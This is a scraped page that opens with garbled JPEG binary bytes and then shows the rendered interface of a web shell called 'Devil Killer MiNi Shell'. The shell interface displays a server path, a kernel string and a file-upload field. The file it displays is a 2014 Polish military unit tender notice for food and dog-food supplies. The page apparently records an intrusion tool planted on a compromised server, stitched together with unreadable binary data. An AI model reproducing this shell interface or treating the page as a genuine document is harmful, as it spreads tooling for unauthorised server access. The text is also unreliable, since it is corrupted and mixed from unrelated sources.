JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141003/327782-N-2014.html

<p class="kh_header"><b>Zegrze: ZAKUP I DOSTAWA RYB, JAJ SPOŻYWCZYCH, TŁUSZCZÓW ROŚLINNYCH 
I KARMY DLA PSÓW DLA JEDNOSTKI WOJSKOWEJ 4809 W ZEGRZU
ORAZ JEDNOSTEK BĘDĄCYCH NA JEJ ZAOPATRZENIU</b><br>
<b>Numer ogłoszenia: 327782 - 2014; data zamieszczenia: 03.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa  4809 , ul. Juzistek 2, 05-131 Zegrze, woj. mazowieckie, tel. 22 6883896, faks 22 6883868.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA RYB, JAJ SPOŻYWCZYCH, TŁUSZCZÓW ROŚLINNYCH 
I KARMY DLA PSÓW DLA JEDNOSTKI WOJSKOWEJ 4809 W ZEGRZU
ORAZ JEDNOSTEK BĘDĄCYCH NA JEJ ZAOPATRZENIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup i dostawa ryb, jaj spożywczych, tłuszczów roślinnych i karmy dla psów Jednostki Wojskowej 4809 w Zegrzu i jednostek będących na jej zaopatrzeniu.

2.	Zamawiający dopuszcza składanie ofert częściowych w podziale na 7 części tj.:

CZĘŚĆ I - zakup i dostawa ryb świeżych i mrożonych
- Grupa Zabezpieczenia (GZ) Zegrze, 05-131 Zegrze ul. Juzistek 2
- Grupa Zabezpieczenia (GZ) Wesoła, 05-075 Warszawa - Wesoła, ul.        
  Okuniewska 1
- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów

CZĘŚĆ II - zakup i dostawa ryb świeżych i mrożonych
- Grupa Zabezpieczenia (GZ) Przasnysz, 06-300 Przasnysz ul. Makowska1

CZĘŚĆ III - zakup i dostawa jaj spożywczych
- Grupa Zabezpieczenia (GZ) Zegrze, 05-131 Zegrze ul. Juzistek 2
- Grupa Zabezpieczenia (GZ) Wesoła, 05-075 Warszawa - Wesoła, ul. 
  Okuniewska 1
- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów

CZĘŚĆ IV - zakup i dostawa jaj spożywczych
- Grupa Zabezpieczenia (GZ) Przasnysz, 06-300 Przasnysz ul. Makowska1

CZĘŚĆ V - zakup i dostawa tłuszczów roślinnych
- Grupa Zabezpieczenia (GZ) Zegrze, 05-131 Zegrze ul. Juzistek 2
- Grupa Zabezpieczenia (GZ) Wesoła, 05-075 Warszawa - Wesoła, ul. 
  Okuniewska 1
- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów

CZĘŚĆ VI - zakup i dostawa tłuszczów roślinnych
- Grupa Zabezpieczenia (GZ) Przasnysz, 06-300 Przasnysz ul. Makowska1

CZĘŚĆ VII - zakup i dostawa karmy dla psów
- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów

3.	Szczegółowy wykaz ilości przedmiotu zamówienia określa Formularz cenowy - stanowiący załącznik nr 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7 do SIWZ.
4.	Wymogi, termin przydatności do spożycia oraz szczegółowy opis przedmiotu zamówienia został określony w części Opis przedmiotu zamówienia - stanowiący załącznik nr  7 do SIWZ.
5.	Zamawiający w związku z Opisem przedmiotu zamówienia (załącznik nr 7 do SIWZ) za pomocą norm dopuszcza rozwiązania równoważne. Wykonawca, który powołuje się na rozwiązania równoważne  jest obowiązany wykazać, że oferowane przez niego dostawy przedmiotu zamówienia spełniają wymagania określone przez Zamawiającego w załączniku nr 7 do SIWZ przedkładając wraz z ofertą.

1)	Oświadczenie Producenta lub Wykonawcy składającego ofertę, że oferuje produkty równoważne wraz z wykazem produktów, których równoważność dotyczy,

2)	Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, protokół z badań laboratoryjnych.

Powyższe dokumenty wymagane są na potwierdzenie, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w załączniku nr 7 do SIWZ (Podstawa:  § 6 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 
19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane Dz. U. z 2013, poz. 231).

6.	Zamawiający wymaga całkowitej realizacji ilości wyszczególnionych w części (oferta na cały asortyment w danej części) - załącznik nr 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6, 03.14.25.00-3, 15.41.11.00-3, 15.71.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w przedmiotowym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis spełnienia warunku:

W przypadku, gdy ofertę składa Wykonawca, który produkuje lub wprowadza do obrotu żywność pochodzenia niezwierzęcego, zwierzęcego oraz żywność zawierającą jednocześnie środki spożywcze pochodzenia niezwierzęcego i produkty pochodzenia zwierzęcego, musi posiadać: 

1)	aktualną decyzję państwowego powiatowego inspektora sanitarnego lub weterynaryjnego o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art. 61 i 62 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. nr 136, poz. 914 z późn. zm.)  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,

lub

aktualną decyzję państwowego powiatowego inspektora weterynaryjnego 
o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art. 20 ustawy z dnia 16 grudnia 2005 r o produktach pochodzenia zwierzęcego (Dz. U z 2006 r. nr 17, poz. 127 z późn. zm.)  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 


lub 

zaświadczenie o wpisie do rejestru zakładów wydane przez organa urzędowej kontroli na podstawie art. 62 ust. 1 pkt 4 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. nr 136, poz. 914 z późn. zm.)  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,


2)	zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010, Nr 136, poz. 914 z późn. zm.) - wystawione nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert,

        Zamawiający dokona oceny spełniania warunku metodą spełnia - nie spełnia.

3)	Potwierdzenie o zgłoszeniu działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i odbioru artykułami rolno-spożywczymi wydane przez wojewódzkiego inspektora, jakości handlowej artykułów rolno-spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę wykonawcy - art.12 ust. 1 ustawy z dnia 21.12. 2000 r., o jakości handlowej artykułów rolno - spożywczych (tekst jednolity Dz. U. z 2014,  poz. 669 z późn. zm.)   

4)	Oświadczenie, że oferowane produkty odpowiadają specyfikacjom technicznym wymaganiom, określonym przez Zamawiającego w opisie przedmiotu zamówienia - załącznik nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis spełnienia warunku: 

Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 

Zamawiający dokona oceny spełniania warunku metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis spełnienia warunku: 

 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 

Zamawiający dokona oceny spełniania warunku metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis spełnienia warunku: 

 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 

Zamawiający dokona oceny spełniania warunku metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis spełnienia warunku

Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże posiadanie:

Opłaconej polisy OC lub innego dokumentu ubezpieczenia (wraz z dowodem opłacenia składki ubezpieczeniowej) w zakresie prowadzonej działalności, posiadającą rozszerzony zakres ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego, za szkody osobowe lub rzeczowe wyrządzone przez produkty wyprodukowane, dostarczone, sprzedane przez ubezpieczonego na kwotę nie mniejszą niż w danej części tj.: 
Część I - 		100.000,00 złotych (słownie: sto tysięcy złotych 00/100)
Część II -    	    8.000,00 złotych (słownie: osiem tysięcy złotych 00/100)
Część III - 	  40.000,00 złotych (słownie: czterdzieści tysięcy złotych 00/100)
Część IV - 	    3.000,00 złotych (słownie: trzy tysiące złotych 00/100)
Część V - 	  50.000,00 złotych (słownie: pięćdziesiąt tysięcy złotych 00/100)
Część VI -   	    4.000,00 złotych (słownie: cztery tysiące złotych 00/100)
Część VII - 	100.000,00 złotych (słownie: sto tysięcy złotych 00/100)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
2.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3.	Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
4.	 Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp. 
5.	W formularzu ofertowym Wykonawcy składający ofertę wspólną powinni wpisać dane teleadresowe, na które ma być kierowana korespondencja od Zamawiającego. 
6.	Sposób składania oświadczeń i dokumentów w ofercie wspólnej: 
a.	dokumenty wspólne, takie jak: formularz ofertowy/formularz cenowy, oświadczenie o spełnianiu warunków udziału w postępowaniu, dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, itp. - składa pełnomocnik Wykonawców, w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia,
b.	jeżeli jednak podmiot występujący wspólnie (spółka cywilna) na podstawie odrębnych przepisów, dla celów podatkowych lub związanych 
z ubezpieczeniami jest traktowany, jako jeden podmiot (jedna jednostka organizacyjna) dokumenty dotyczące ubezpieczeń, podatków i opłat powinien złożyć niezależnie ten podmiot,
c.	 dokumenty dotyczące własnej firmy, takie jak: oświadczenie o braku podstaw do wykluczenia z postępowania oraz dokumenty potwierdzające, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia - składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia we własnym imieniu,
d.	kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców. Zamawiający, dopuszcza również poświadczanie za zgodność z oryginałem kopii dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną zarówno przez lidera - pełnomocnika do reprezentowania wykonawców na podstawie stosownego umocowania w tym zakresie. Lider - pełnomocnik, chcąc właściwie poświadczyć dokumenty partnera za zgodność z oryginałem, powinien posiadać umocowanie do działania w imieniu partnera, w tym także do uwierzytelniania składanych w jego imieniu dokumentów. 
7.	Przed podpisaniem umowy (w przypadku wyboru najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę regulującą ich współpracę, zawierającą, co najmniej 
a.	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz solidarnej odpowiedzialności za realizację zamówienia,
b.	określenie zakresu działania poszczególnych stron umowy, 
c.	czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia. 
8.	Wymagane jest, aby Wykonawca swoją ofertę złożył m.in. na wypełnionym i podpisanym:
Formularzu ofertowym - z wykorzystaniem wzoru wg załącznika nr 1 do SIWZ.
Formularzu cenowym - z wykorzystaniem wzoru wg załącznika nr 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7 do SIWZ.
9.	Wykonawca zobowiązany jest do oferty dołączyć następujący dokument:
   Pełnomocnictwo  tylko w sytuacjach określonych w Rozdziale XIII pkt. 5 lub 
 w przypadku składania oferty wspólnej Rozdział V niniejszej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Projekt umowy stanowi załącznik nr 6 do SIWZ w wersji opracowanej przez Zamawiającego, z którą każdy Wykonawca powinien się zapoznać. Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na warunkach określonych 
w projekcie umowy.
2.	Zamawiający zastrzega sobie prawo ostatecznego zmniejszenia lub zwiększenia ilości poszczególnych asortymentów  będących przedmiotem umowy. Wykonawcy nie będą przysługiwały z tego tytułu żadne roszczenia finansowe pomimo ceny całkowitej określonej w umowie.
3.	Ostateczna kwota wynagrodzenia Wykonawcy zależy od faktycznie zamówionych przez Zamawiającego produktów w ramach niniejszej umowy. 	
4.	Wykonawca zagwarantuje zmianę ilości i częstotliwości dostaw w stosunku do wcześniej złożonych zamówień w przypadkach, których nie można było przewidzieć w dniu zawarcia umowy, (w szczególności zmiany stanów osobowych, restrukturyzacji Sił Zbrojnych, zmiany obowiązujących aktów prawnych w zakresie uprawnień do wyżywienia żołnierzy/wyżywienia psów). Wartością końcową umowy będzie wówczas wartość faktycznie zrealizowanych dostaw.
5.	W szczególnie uzasadnionych przypadkach (np. osiągania gotowości do podjęcia działań, szkolenia rezerw osobowych, likwidacji klęsk żywiołowych, restrukturyzacji Sił Zbrojnych, zmiany obowiązujących aktów prawnych w zakresie uprawnień do wyżywienia żołnierzy/wyżywienia psów lub innych zadań postawionych Zamawiającemu przez organa władzy państwowej), Wykonawca zagwarantuje  zwiększenie ilości i częstotliwości dostaw w stosunku do wcześniej złożonych zapotrzebowań.
6.	Wykonawca zobowiązuje się zabezpieczyć dla Zamawiającego ogólne ilości środków spożywczych,  niezbędnych do zabezpieczenia osiągania przez Zamawiającego gotowości do podjęcia działań, na zasadach określonych rozkazem Szefa Sztabu Generalnego WP nr PF 551 z dnia 14 lipca 2010 r. w sprawie szczegółowych zasad 
i norm żywienia potrzeb mobilizacyjnych i wojennych Sił Zbrojnych w środki zaopatrzenia.  
7.	Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w przypadku wystąpienia, co najmniej jednej 
z okoliczności wymienionych poniżej: 
a.	Zamawiający dopuszcza możliwość zmiany umowy w sytuacji zaistnienia okoliczności, których nie można było przewidzieć w chwili zawierania umowy lub zmiany te są korzystne dla Zamawiającego;
b.	Zamawiający dopuszcza zmiany podyktowane zmianą powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki VAT. Wartość należnego wynagrodzenia zostanie skorygowana o wartość należnego podatku poprzez dodanie do wartości netto wartości należnego podatku VAT, zgodnie 
z obowiązującymi w tym zakresie przepisami prawa,
c.	zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
1)	 o charakterze niezależnym od stron,
2)	 którego strony nie mogły przewidzieć przed zawarciem umowy,
3)	którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
4)	której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
d.	zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności
   spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami
organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
e.	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia         
umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania Umowy, zgodnie ze specyfikacją istotnych warunków zamówienia 
i umową   
- Zamawiający dopuszcza możliwość zmiany Umowy, w szczególności terminu realizacji zamówienia. 
8.	Powyższe zmiany wymagają zachowania formy pisemnej (w formie aneksu) pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.26wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia (SIWZ) można uzyskać w siedzibie Zamawiającego pod adresem: Jednostka Wojskowa 4809, ul. Juzistek 2, 05-131 Zegrze, pokój nr 319 B, budynek nr 220..</p>
